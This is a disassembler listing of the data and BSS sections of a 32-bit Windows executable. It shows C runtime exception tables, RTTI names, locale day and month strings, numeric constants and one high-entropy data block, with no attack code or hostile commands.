dword_4217A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CD41+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40CE50
align 10h
dword_4217C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D420+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40D4F2
align 10h
dword_4217E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D94F+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DA46
align 10h
dword_421800 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DA6D+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DBAB
align 10h
dword_421820 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DD29+2�o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DE97
align 10h
dword_421840 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DFD3+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E069
align 10h
dword_421860 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E6B0+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E749
align 10h
dword_421880 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EDEE+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40EE80
align 10h
dword_4218A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EEB0+2�o
dd 0FFFFFFC8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F046
dd 2 dup(0)
dd offset sub_40EF7D
dword_4218C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F04F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F126
align 8
dword_4218E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F789+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40F7A6h, 40F7C2h, 0
dword_421908 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4100DA+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 410107h, 410123h, 0
dd offset off_425918
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 4013CEh, 0
dd offset off_425938
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 4013E6h, 0
dd offset off_425958
align 8
dd 0FFFFFFFFh, 0
dword_421970 dd 0Ch, 402C72h, 3, 421924h, 421940h, 42195Ch, 0
; DATA XREF: seg001:00421994�o
dd offset loc_4010E1
dd 0
dd offset dword_421970+8
dd 0
dd offset off_425974
dd 0
dd 0FFFFFFFFh, 0
dword_4219AC dd 0Ch, 401637h, 2, 421998h, 42195Ch, 0 ; DATA XREF: seg001:004219CC�o
dd offset sub_401038
dd 0
dd offset dword_4219AC+8
dword_4219D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_419760+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 5 dup(0)
dd 0FFFFFFFFh, 41C26Ah
dword_421A00 dd 19930522h, 1, 4219F8h, 5 dup(0) ; DATA XREF: seg000:0041C285�o
dd 1, 0FFFFFFFFh, 41C28Fh
dword_421A2C dd 19930522h, 1, 421A24h, 5 dup(0) ; DATA XREF: seg000:0041C2AA�o
dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset sub_40150F
dd 40h, 2 dup(0)
dd offset loc_40149D
dd 2 dup(2), 3, 1, 421A70h, 2 dup(0)
dd 3, 1, 421A80h
dword_421AB8 dd 19930522h, 4, 421A50h, 2, 421A90h, 3 dup(0) ; DATA XREF: seg000:0041C21A�o
dd 1, 0
dd 0FFFFFFFFh, 41C224h
dword_421AE8 dd 19930522h, 1, 421AE0h, 5 dup(0) ; DATA XREF: seg000:0041C23D�o
dd 1, 0
dd 0FFFFFFFFh, 41C247h
dword_421B18 dd 19930522h, 1, 421B10h, 5 dup(0) ; DATA XREF: seg000:0041C260�o
dd 1, 0
dd 0FFFFFFFFh, 41C2B4h
dword_421B48 dd 19930522h, 1, 421B40h, 5 dup(0) ; DATA XREF: seg000:0041C2CD�o
dd 1, 0
dd 0FFFFFFFFh, 41C2D7h
dword_421B78 dd 19930522h, 1, 421B70h, 5 dup(0) ; DATA XREF: seg000:0041C2FC�o
dd 1, 0
dd 0FFFFFFFFh, 41C306h
dword_421BA8 dd 19930522h, 1, 421BA0h, 5 dup(0) ; DATA XREF: seg000:0041C331�o
dd 1, 0
dd 0FFFFFFFFh, 41C33Bh
dword_421BD8 dd 19930522h, 1, 421BD0h, 5 dup(0) ; DATA XREF: seg000:0041C366�o
dd 1, 35D5A051h, 0C7C0F3C6h, 12CF5927h, 0A83D0345h, 56BBFC05h
dd 0C46AB159h, 0E41116D5h, 0E41B1B4Dh, 512CD20Ch, 0F1E223E2h
dd 7AE6E5EAh, 85491969h, 4B495A20h, 0BD4AACEBh, 0A3A4AA5Eh
dd 7145BD30h, 62B23C29h, 2E12EABAh, 482AF270h, 0AD532319h
dd 0EF1D9209h, 55D3E9BAh, 36B7DC4Ch, 0E361B2DAh, 2BBAD513h
dd 7E515168h, 5C4CD89Dh, 1C3B7A8Eh, 55FC91B0h, 0A38555A7h
dd 2ECDEDA9h, 98048687h, 719C317h, 13A91543h, 6BA32B91h
dd 0BDBFA53Ah, 1263660Ch, 0F05DA3Ah, 0A07428D6h, 2DA46F7Fh
dd 0F32F730Bh, 8469CCFh, 4C3E76B5h, 95658ECh, 4AC74EDCh
dd 57ADECC7h, 0C12B8944h, 0D6EFBFFCh, 83770474h, 2921C160h
dd 881F4E7Bh, 5E63D830h, 9E454562h, 0ED967812h, 526BE610h
dd 0E175A4F2h, 94F21035h, 0E762134Fh, 0A9E62F5Ch, 8AF146A4h
dd 577FF0FEh, 0B7B4B61Bh, 4CBAF9AEh, 0DCBCFD4Fh, 63E3A9A3h
dd 0C8D3A30Eh, 784F32F0h, 649B5BA9h, 0BA9E108h, 0A30A3A3Ah
dd 0A5EBAFB5h, 0DEFCDB7Bh, 96F36F44h, 0E57BB340h, 861D783h
dd 30BAB01Dh, 1233F44Eh, 6341934Ah, 0FA5475B1h, 0BDCBCBA5h
dd 417B98B7h, 2E5F9EA0h, 196E183Ah, 1B744680h, 3BA2987h
dd 0B132140Dh, 9D458A5Dh, 0A52EAAA1h, 0DDE89F34h, 71CEF684h
dd 84B14B23h, 536F1BF9h, 738EC933h, 0D12A04C8h, 7C8009D2h
dd 39BE0F1h, 575C709h, 0E42022D1h, 9345C1E0h, 7BF5346Bh
dd 7787404Bh, 35A87ABAh, 0E636D90Ch, 0AB25251Eh, 1A405ADBh
dd 0C58E03C2h, 9959867Ch, 0C01C7BB6h, 202582ECh, 7959A95Eh
dd 706EC64Bh, 0BF0AF5BCh, 0CC899939h, 601D6533h, 86059E85h
dd 763436DBh, 58664C10h, 8D1A5BFDh, 0B50BB6D0h, 742AFB9Ah
dd 6ACFB3DDh, 649ABCB3h, 5AB8E108h, 2067CBD1h, 22AABB15h
dd 226D9DF3h, 4B4AF47Fh, 1CE051FAh, 52AA8A89h, 53A4EE44h
dd 0A00481C4h, 6B8FF80h, 13772666h, 2196980Ch, 0DB660E2Bh
dd 1A37768Bh, 992B63F5h, 0BAB78600h, 6B23246Fh, 0A111519Ch
dd 0FF3D0A59h, 2FA1BF59h, 362CD3D6h, 0B84F2C70h, 10140DAh
dd 0D493D0EFh, 45C86CB8h, 11397C10h, 0AFA59B8Ah, 0F42C76BCh
dd 8BA6057Dh, 835C5EEFh, 3C23857Ah, 1F3D7C8Eh, 126DC033h
dd 1872437Eh, 2C3A6EC4h, 7AC628ECh, 3179D08Fh, 0C3EA64B1h
dd 0B15AB6FDh, 458F5D7Dh, 0C7D9CD36h, 93971AE8h, 27042076h
dd 598FA999h, 0DB2B132Fh, 0DA8ADD6Fh, 0C98EC5CEh, 0FB4A4CE6h
dd 0B0DE9F9Ah, 0EDDA1BDDh, 6BDB6A27h, 946B3A1Ah, 868713E5h
dd 0CD69E9D1h, 0C38C2D62h, 0FC80EAF8h, 7074580Ah, 0FCB05F9Ah
dd 3107A0DDh, 137492AEh, 5AAB7A68h, 0E7103764h, 0FA4F75A4h
dd 988FD4EBh, 575FD66Fh, 75BCBE1Fh, 3D740D3Ah, 22478693h
dd 3054C535h, 0B3A57457h, 0C42AEDADh, 0CE6F0F96h, 0C9FF35A2h
dd 58579895h, 5C67D23h, 0F054EA9Ch, 0E11D01D0h, 0CEC07A3Bh
dd 0C2B86B00h, 457C6606h, 70FEB089h, 763B80C1h, 2539288Ah
dd 0F1292954h, 0BC4B4CE4h, 9D3A7B0Dh, 5D277F54h, 8951204Dh
dd 7128523h, 845760Eh, 0FE6C4377h, 0BC8E60F6h, 0A0043D5Ah
dd 31ADFF80h, 0F9100965h, 3ECBCBA5h, 25C1693Ch, 50A3E2C1h
dd 8BD071FFh, 44CA9B46h, 0C703F0D1h, 7ECECCB5h, 0DEB7B08Eh
dd 1931FBC6h, 0E3A10B90h, 0A3F4B18Fh, 8CB27BA6h, 64270B18h
dd 0CCF96224h, 874EC22Eh, 0D32DCF2Eh, 0AE9F9D4Fh, 2715815Bh
dd 1D67997Eh, 77CF592Fh, 650CE591h, 0E95D96BDh, 0ABAA9FA2h
dd 0F6CFF15Eh, 0E960B4DBh, 0CDA29733h, 866264F2h, 4719756Ah
dd 0F6F031E9h, 7BEDADE9h, 208254BBh, 1F42D1C6h, 0DC8CA265h
dd 0D224A526h, 8424650Dh, 0C63AB4EDh, 3B9F179h, 0CFDAFDB8h
dd 781A7AF0h, 0F4FED0AFh, 330800CEh, 0A5656BE7h, 88D72694h
dd 0C621FB54h, 0EA2A2CD6h, 51DBC518h, 21418091h, 39878D77h
dd 0E40BDB9Eh, 0C57F94F9h, 445B8F09h, 0AA0AFE00h, 2C93C422h
dd 4E2EF3D7h, 78A3F1B8h, 3EE8DECFh, 123979F2h, 0B4F650CBh
dd 52CC02CFh, 4799CE29h, 0EFF2391Dh, 0E5E560B8h, 13232351h
dd 70D0471h, 863E72EBh, 97D39A49h, 52113414h, 538A8831h
dd 0FE449348h, 0B629B4EFh, 0CD06741Fh, 0A3BD9732h, 9B05D1DDh
dd 98D4DBD7h, 465FF6E6h, 0D9998A9Ch, 4DE310FDh, 558BE81Fh
dd 80B2C85Eh, 7AAFBAB6h, 93AECDE4h, 0D9EB8B2Fh, 0BDCFCD67h
dd 0C06A14DBh, 21AD1137h, 8B6F642Ch, 0B38AA649h, 0A3D23E39h
dd 42D05977h, 0A6F58F47h, 2518FAA1h, 0C8795A07h, 18EF401Eh
dd 0FB326460h, 3D5FDCEFh, 7F04093Eh, 0B5E7E7B3h, 0A9452707h
dd 4C9BDAC0h, 57ED07B2h, 0BFBD8F84h, 0F0D407AEh, 8FF0327Ah
dd 0E0DA3BD2h, 0AFA27F49h, 72ECDF36h, 30B895B0h, 0B357A5F8h
dd 1F3041D5h, 0E87D9A29h, 0CB67419Eh, 36B9DC10h, 1535B2DAh
dd 0A5E92BC2h, 0CA15154Ah, 29107431h, 0CF9EDF42h, 0CB890955h
dd 82471969h, 0D81C7D61h, 11F35341h, 23108F75h, 128BFFEBh
dd 0FAFDD0CEh, 92610481h, 66ED0E4Bh, 3563EEA2h, 0D39A8CD9h
dd 0BBA2984Ah, 0F812A2D3h, 0CE47C4E3h, 389CA6C0h, 94A9A994h
dd 0A2E5AA81h, 3365A4A5h, 7DA31A6Ch, 640ADE6Ch, 0E14A6AD9h
dd 3F4FCF63h, 24FABEFEh, 0D6FE4772h, 3ACC0BA5h, 25909236h
dd 439524FDh, 478DCCB9h, 365B40FEh, 0B2A77955h, 0A952A56Dh
dd 0EFB0CE2Dh, 35D23CEAh, 77517F92h, 0BF2DC383h, 0E6FCF26Bh
dd 76EF2E49h, 0BADCh, 38Dh dup(0)
seg001 ends
; Section 3. (virtual address 00023000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00023000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
seg002 segment para public 'BSS' use32
assume cs:seg002
;org 423000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd offset dword_41D300
dd offset dword_41D300
off_423008 dd offset off_41D38C ; DATA XREF: seg001:00420D94�o
; seg001:00420DBC�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset dword_41D300
dd offset dword_41D300
off_423030 dd offset off_41D38C ; DATA XREF: seg001:00420DF8�o
; seg001:00420E18�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset dword_41D300
align 10h
dword_423050 dd 2 ; DATA XREF: sub_409AB4+42�r
; sub_409C54+19�r ...
align 10h
dd offset sub_40B11E
dword_423064 dd 0BB40E64Eh ; DATA XREF: sub_401C1D+9�r
; sub_401CC0+C�r ...
dword_423068 dd 44BF19B1h ; DATA XREF: sub_40468E+AE�r
; sub_40B08A+29�w ...
align 10h
dword_423070 dd 17h dup(0) ; DATA XREF: sub_4047C1+29�o
; sub_4049A0+63�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_423290 db 0 ; DATA XREF: sub_404C69+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 23h dup(0)
byte_423398 db 0 ; DATA XREF: sub_404C69+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
db 0
aAbcdefghijkl_0 db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
dd 21h dup(0)
off_423498 dd offset dword_423070 ; DATA XREF: sub_40271F+41�r
; sub_4049A0+4C�r ...
byte_42349C db 1 ; DATA XREF: sub_404ABE+E3�r
db 2, 4, 8
dword_4234A0 dd 3A4h ; DATA XREF: sub_404ABE:loc_404AFA�r
dword_4234A4 dd 82798260h ; DATA XREF: sub_404ABE+12B�r
dd 21h, 0
dword_4234B0 dd 0DFA6h ; DATA XREF: sub_404ABE+C6�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_41DF40+4
dword_423594 dd 0FFFFFFFEh ; DATA XREF: sub_40271F+2C�r
; sub_40271F+4C�r ...
dword_423598 dd 43h, 0 ; DATA XREF: sub_404E21:loc_404F1E�o
; sub_404F61:loc_404FAC�o ...
dword_4235A0 dd 1, 15h dup(0) ; DATA XREF: sub_405073+28�o
; sub_4053B5+DA�o ...
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_423F38
dd 2 dup(0)
off_423668 dd offset asc_41DD40 ; DATA XREF: sub_40F17F+D�r
; sub_40F1FC+D�r ...
; " ((((( H"
dd offset dword_41E148+80h
dd offset dword_41E148+200h
dd offset off_423E78
off_423678 dd offset dword_4235A0 ; DATA XREF: sub_40271F+24�r
; sub_4050B1+4E�r ...
dd 1
off_423680 dd offset dword_4235A0 ; DATA XREF: sub_40A9EB+17�o
dd offset dword_423070
dword_423688 dd 0FFFFFFFFh ; DATA XREF: sub_405127+13�r
; sub_405193+13�r ...
dword_42368C dd 0FFFFFFFFh ; DATA XREF: sub_405127+1�r
; sub_405127+1E�r ...
dword_423690 dd 1 ; DATA XREF: sub_405798:loc_40579E�r
dword_423694 dd 16h ; DATA XREF: sub_405798:loc_4057B9�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8 dd 0Ch ; DATA XREF: sub_4057D3+9�o
dword_4237FC dd 8 ; DATA XREF: sub_4057E6+9�o
dword_423800 dd 0 ; DATA XREF: sub_405881:loc_4058BE�w
; sub_4058CA+8�o ...
dword_423804 dd 1 ; DATA XREF: sub_405881:loc_40588A�r
dd 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 22h dup(0)
dword_423920 dd 10h ; DATA XREF: sub_4058CA+2A�o
; sub_4058CA+4A�o
off_423924 dd offset aNull_0 ; DATA XREF: sub_4069D7:loc_406EC5�r
; sub_4069D7+7E7�r
; "(null)"
off_423928 dd offset aNull ; DATA XREF: sub_4069D7+433�r
; "(null)"
align 10h
off_423930 dd offset sub_407AEA ; DATA XREF: sub_40785D+E�r
; sub_407B19+45�w
dd 3 dup(0)
dd offset dword_41D300
align 10h
off_423950 dd offset dword_433DC0 ; DATA XREF: sub_408084�o
; sub_40808A+52�o ...
align 8
dd offset dword_433DC0
dd 101h
dword_423960 dd 2 dup(0) ; DATA XREF: sub_40808A+74�o
dd 1000h, 4 dup(0)
dd 2, 1, 6 dup(0)
dd 2 dup(2), 7 dup(0)
dword_4239C0 dd 7Ch dup(0) ; DATA XREF: sub_40808A+A4�o
dword_423BB0 dd 8 dup(0) ; DATA XREF: sub_40815B+D�o
; sub_4081AD+D�o
dword_423BD0 dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA XREF: sub_4067D6:loc_4068DC�o
; sub_4069D7:loc_406AB3�o ...
dword_423C00 dd 2 ; DATA XREF: sub_409AB4:loc_409AC0�r
off_423C04 dd offset aR6002FloatingP ; DATA XREF: sub_409AB4:loc_409BE4�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41DA94h, 9, 41DA68h, 0Ah, 41D9D0h, 10h, 41D9A4h
dd 11h, 41D974h, 12h, 41D950h, 13h, 41D924h, 18h, 41D8ECh
dd 19h, 41D8C4h, 1Ah, 41D88Ch, 1Bh, 41D854h, 1Ch, 41D82Ch
dd 1Eh, 41D80Ch, 1Fh, 41D7A8h, 20h, 41D770h, 21h, 41D678h
dd 22h, 41D5D8h, 78h, 41D5C8h, 79h, 41D5B8h, 7Ah, 41D5A8h
dd 0FCh, 41D5A4h, 0FFh, 41D594h
byte_423CB8 db 0 ; DATA XREF: sub_409DAD:loc_40A10E�r
; sub_409DAD+36F�r
align 4
dd 2Fh dup(0)
dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2 dup(0)
dword_423DB8 dd 1B3Fh ; DATA XREF: sub_40A6EF+D�r
align 10h
dword_423DC0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_405266+1D�o
; sub_4053B5+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423E38 dd 3 ; DATA XREF: sub_40AA15+A1�r
; sub_40AA15+C0�r ...
dword_423E3C dd 7 ; DATA XREF: sub_40AA15+A7�r
; sub_40AA15+C6�r ...
dd 78h
dword_423E44 dd 0Ah ; DATA XREF: sub_40AA15+22�r
; sub_40DCE8+4�r
dd offset dword_41D300
dd offset sub_40B11E
off_423E50 dd offset off_41D38C ; DATA XREF: sub_40BA07+128�o
; seg001:00420E40�o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
dd offset asc_41DD40 ; " ((((( H"
dd offset dword_41DF40+2
off_423E78 dd offset aSun ; DATA XREF: sub_404E21+D9�o
; seg002:00423674�o ...
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_41E148+300h
dd 409h, 1, 0
dd offset off_423E78
dword_423F34 dd 2Eh ; DATA XREF: seg002:off_423F38�o
off_423F38 dd offset dword_423F34 ; DATA XREF: sub_404E21+14�o
; sub_40C6C4+B�r ...
off_423F3C dd offset dword_426418 ; DATA XREF: sub_40C6C4+1D�r
off_423F40 dd offset dword_426418 ; DATA XREF: sub_40C6C4+2F�r
off_423F44 dd offset dword_426418 ; DATA XREF: sub_40C704+C�r
off_423F48 dd offset dword_426418 ; DATA XREF: sub_40C704+1E�r
off_423F4C dd offset dword_426418 ; DATA XREF: sub_40C704+30�r
off_423F50 dd offset dword_426418 ; DATA XREF: sub_40C704+42�r
off_423F54 dd offset dword_426418 ; DATA XREF: sub_40C704+54�r
off_423F58 dd offset dword_426418 ; DATA XREF: sub_40C704+66�r
off_423F5C dd offset dword_426418 ; DATA XREF: sub_40C704+78�r
dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80 dd offset sub_41059E ; DATA XREF: sub_40D59E:loc_40D5A2�r
; sub_40F70B+5�w
off_423F84 dd offset sub_41059E ; DATA XREF: sub_40F70B+A�w
off_423F88 dd offset sub_41059E ; DATA XREF: sub_40F70B+14�w
off_423F8C dd offset sub_41059E ; DATA XREF: sub_40F70B+1E�w
off_423F90 dd offset sub_41059E ; DATA XREF: sub_40F70B+28�w
off_423F94 dd offset sub_41059E ; DATA XREF: sub_40F70B+32�w
off_423F98 dd offset sub_41059E ; DATA XREF: sub_4069D7+61A�r
; sub_40F70B+37�w
off_423F9C dd offset sub_41059E ; DATA XREF: seg000:00409458�r
; sub_40F70B+41�w
off_423FA0 dd offset sub_41059E ; DATA XREF: sub_4069D7+65F�r
; sub_40F70B+4B�w
off_423FA4 dd offset sub_41059E ; DATA XREF: sub_4069D7+640�r
; sub_40F70B+55�w
align 10h
dword_423FB0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_40EC54+2�o
; sub_40EC5D+2�o
dword_423FC0 dd 2694h ; DATA XREF: sub_40FDF4+3�r
; sub_40FE47+5D�r
dd 9875h, 9873h, 0
dword_423FD0 dd 14h ; DATA XREF: sub_40FD56:loc_40FD5E�r
off_423FD4 dd offset aExp ; DATA XREF: sub_40FD56:loc_40FDCE�r
; "exp"
dd 1Dh, 41DC18h, 1Ah, 41DC08h, 1Bh, 41DC0Ch, 1Fh, 41EE10h
dd 13h, 41EE08h, 21h, 41EE00h, 0Eh, 41DC00h, 0Dh, 41DBF8h
dd 0Fh, 41DBDCh, 10h, 41EDF8h, 5, 41EDF0h, 1Eh, 41DBC0h
dd 12h, 41DBBCh, 20h, 41DBB8h, 0Ch, 41DBD4h, 0Bh, 41DBCCh
dd 15h, 41EDE8h, 1Ch, 41DBC4h, 19h, 41EDE0h, 11h, 41EDD8h
dd 18h, 41EDD0h, 16h, 41EDC8h, 17h, 41EDC0h, 22h, 41EDBCh
dd 23h, 41EDB8h, 24h, 41EDB4h, 25h, 41EDACh, 26h, 41EDA0h
dbl_4240B8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20:loc_40FBF0�r
; sub_40FB20:loc_40FBF8�r
dd 0
dd 0FFF80000h
dbl_4240C8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20+89�r
; sub_40FB20+A4�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4240E0 dt 2.3562723457267347066e313 ; DATA XREF: sub_410084+B�r
; sub_410084+1E�r
align 4
tbyte_4240EC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410084+30�r
align 4
dword_4240F8 dd 1 ; DATA XREF: sub_4100DA+1C�r
; sub_4100DA+4C�w
byte_4240FC db 3 ; DATA XREF: sub_4101BD+1B�r
; sub_4101BD:loc_4101FB�r
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110 dd 545350h, 0Fh dup(0) ; DATA XREF: seg002:00424190�o
dword_424150 dd 544450h, 0Fh dup(0) ; DATA XREF: seg002:00424194�o
dd offset dword_424110
dd offset dword_424150
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_424218 dd 2 ; DATA XREF: sub_4104DC+13�r
; sub_4104DC+4F�r ...
align 10h
dword_424220 dd 0FFFFFFFEh ; DATA XREF: sub_41144A:loc_411463�r
dword_424224 dd 0FFFFFFFEh ; DATA XREF: sub_4104DC+1B�r
; sub_4104DC:loc_410505�r ...
align 10h
dword_424230 dd 400h ; DATA XREF: sub_411969:loc_411D0D�r
; sub_411969+44D�r
dword_424234 dd 0FFFFFC01h ; DATA XREF: sub_411969:loc_411AD8�r
dword_424238 dd 35h ; DATA XREF: sub_411969+78�r
; sub_411969+176�r ...
dword_42423C dd 0Bh ; DATA XREF: sub_411969:loc_411C74�r
; sub_411969+3AA�r ...
dword_424240 dd 40h ; DATA XREF: sub_411969+519�r
dword_424244 dd 3FFh ; DATA XREF: sub_411969+452�r
; sub_411969:loc_411DCC�r
dword_424248 dd 80h ; DATA XREF: sub_411EAB:loc_41224F�r
; sub_411EAB+44D�r
dword_42424C dd 0FFFFFF81h ; DATA XREF: sub_411EAB:loc_41201A�r
dword_424250 dd 18h ; DATA XREF: sub_411EAB+78�r
; sub_411EAB+176�r ...
dword_424254 dd 8 ; DATA XREF: sub_411EAB:loc_4121B6�r
; sub_411EAB+3AA�r ...
dword_424258 dd 20h ; DATA XREF: sub_411EAB+519�r
dword_42425C dd 7Fh ; DATA XREF: sub_411EAB+452�r
; sub_411EAB:loc_41230E�r
dword_424260 dd 2 dup(0) ; DATA XREF: sub_4123ED+363�o
; sub_412AB1+18E�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
